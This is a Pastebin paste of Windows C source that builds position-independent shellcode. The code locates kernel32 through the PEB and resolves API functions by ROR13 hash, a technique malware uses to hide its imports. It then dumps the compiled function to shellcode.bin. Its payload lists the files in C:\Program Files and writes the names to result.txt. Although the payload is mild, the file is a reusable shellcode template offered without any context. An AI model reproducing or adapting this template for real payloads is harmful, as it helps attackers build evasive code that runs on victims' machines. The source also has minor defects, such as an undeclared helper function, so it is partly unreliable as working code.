Advertisement
Guest User

Untitled

a guest
Jun 28th, 2016
186
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.56 KB | None | 0 0
  1. #include <stdio.h>
  2. #include <Windows.h>
  3. #include <winternl.h>
  4. #include <wchar.h>
  5. #include <tlhelp32.h>
  6. #include <tchar.h>
  7. #include <stdio.h>
  8. #include <strsafe.h>
  9.  
  10. PPEB get_peb(void);
  11. DWORD __stdcall unicode_ror13_hash(const WCHAR *unicode_string);
  12. DWORD __stdcall ror13_hash(const char *string);
  13. HMODULE __stdcall find_module_by_hash(DWORD hash);
  14. FARPROC __stdcall find_function(HMODULE module, DWORD hash);
  15.  
  16. void __stdcall shell_code()
  17. {
  18. HMODULE kern32 = find_module_by_hash(0x8FECD63F);
  19.  
  20. FARPROC FindFirstFileA = find_function(kern32, 0x63D6C065);
  21. FARPROC FindNextFileA = find_function(kern32, 0xA5E1AC97);
  22. FARPROC FindClose = find_function(kern32, 0x23545978);
  23.  
  24. FARPROC CreateFileA = find_function(kern32, 0x7C0017A5);
  25. FARPROC WriteFile = find_function(kern32, 0xE80A791F);
  26. FARPROC CloseHandle = find_function(kern32, 0x0FFD97FB);
  27.  
  28. DWORD dwBytesWritten = 0;
  29. char path[] = { 'C', ':', '\\', 'P', 'r', 'o', 'g', 'r', 'a', 'm', ' ','F','i','l','e','s','\\','*', 0 };
  30. char file_name[] = { 'r', 'e', 's', 'u', 'l', 't', '.', 't', 'x', 't', 0 };
  31. char n[] = { '\n', 0 };
  32.  
  33. WIN32_FIND_DATA ffd;
  34. HANDLE hFind = FindFirstFileA(path, &ffd);
  35. HANDLE hFile = CreateFileA(file_name, // name of the write
  36. GENERIC_WRITE, // open for writing
  37. 0, // do not share
  38. NULL, // default security
  39. CREATE_NEW, // create new file only
  40. FILE_ATTRIBUTE_NORMAL, // normal file
  41. NULL); // no attr. template
  42. do
  43. {
  44. //printf(TEXT(" %s %d\n"), ffd.cFileName,strlen2(ffd.cFileName));
  45. WriteFile(
  46. hFile, // open file handle
  47. ffd.cFileName, // start of data to write
  48. (DWORD)strlen2(ffd.cFileName), // number of bytes to write
  49. &dwBytesWritten, // number of bytes that were written
  50. NULL); // no overlapped structure
  51. WriteFile(
  52. hFile, // open file handle
  53. n, // start of data to write
  54. (DWORD)strlen2(n), // number of bytes to write
  55. &dwBytesWritten, // number of bytes that were written
  56. NULL);
  57.  
  58. } while (FindNextFileA(hFind, &ffd) != 0);
  59. CloseHandle(hFile);
  60. FindClose(hFind);
  61. return;
  62. }
  63.  
  64. int strlen2(str){
  65. register const char *s;
  66. for (s = str; *s; ++s);
  67. return(s - str);
  68. }
  69.  
  70. HMODULE __stdcall find_module_by_hash(DWORD hash)
  71. {
  72. PPEB peb;
  73. /*__asm {
  74. mov eax, fs:[0x30]
  75. mov [peb], eax
  76. }*/
  77. LDR_DATA_TABLE_ENTRY *module_ptr, *first_mod;
  78.  
  79. peb = get_peb();
  80.  
  81. module_ptr = (PLDR_DATA_TABLE_ENTRY)peb->Ldr->InMemoryOrderModuleList.Flink;
  82. first_mod = module_ptr;
  83.  
  84. do {
  85. if (unicode_ror13_hash((WCHAR *)module_ptr->FullDllName.Buffer) == hash)
  86. return (HMODULE)module_ptr->Reserved2[0];
  87. else
  88. module_ptr = (PLDR_DATA_TABLE_ENTRY)module_ptr->Reserved1[0];
  89. } while (module_ptr && module_ptr != first_mod);
  90.  
  91. return INVALID_HANDLE_VALUE;
  92. }
  93.  
  94. DWORD __stdcall ror13_hash(const char *string)
  95. {
  96. DWORD hash = 0;
  97.  
  98. while (*string) {
  99. DWORD val = (DWORD)*string++;
  100. hash = (hash >> 13) | (hash << 19);
  101. hash += val;
  102. }
  103. return hash;
  104. }
  105.  
  106. DWORD __stdcall unicode_ror13_hash(const WCHAR *unicode_string)
  107. {
  108. DWORD hash = 0;
  109.  
  110. while (*unicode_string != 0)
  111. {
  112. DWORD val = (DWORD)*unicode_string++;
  113. hash = (hash >> 13) | (hash << 19);
  114. hash += val;
  115. }
  116. return hash;
  117. }
  118.  
  119. PPEB __declspec(naked) get_peb(void)
  120. {
  121. __asm {
  122. mov eax, fs:[0x30]
  123. ret
  124. }
  125. }
  126.  
  127.  
  128. FARPROC __stdcall find_function(HMODULE module, DWORD hash)
  129. {
  130. IMAGE_DOS_HEADER *dos_header;
  131. IMAGE_NT_HEADERS *nt_headers;
  132. IMAGE_EXPORT_DIRECTORY *export_dir;
  133. DWORD *names, *funcs;
  134. WORD *nameords;
  135. int i;
  136.  
  137. dos_header = (IMAGE_DOS_HEADER *)module;
  138. nt_headers = (IMAGE_NT_HEADERS *)((char *)module + dos_header->e_lfanew);
  139. export_dir = (IMAGE_EXPORT_DIRECTORY *)((char *)module + nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
  140. names = (DWORD *)((char *)module + export_dir->AddressOfNames);
  141. funcs = (DWORD *)((char *)module + export_dir->AddressOfFunctions);
  142. nameords = (WORD *)((char *)module + export_dir->AddressOfNameOrdinals);
  143.  
  144. for (i = 0; i < export_dir->NumberOfNames; i++)
  145. {
  146. char *string = (char *)module + names[i];
  147. if (hash == ror13_hash(string))
  148. {
  149. WORD nameord = nameords[i];
  150. DWORD funcrva = funcs[nameord];
  151. return (FARPROC)((char *)module + funcrva);
  152. }
  153. }
  154.  
  155. return NULL;
  156. }
  157.  
  158. void __declspec(naked) END_SHELLCODE(void) {}
  159.  
  160. int main(int argc, char *argv[])
  161. {
  162. FILE* file = fopen("shellcode.bin", "w");
  163. fwrite(&shell_code, ((int)END_SHELLCODE - (int)shell_code), 1, file);
  164. fclose(file);
  165.  
  166. shell_code();
  167.  
  168. return 0;
  169. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement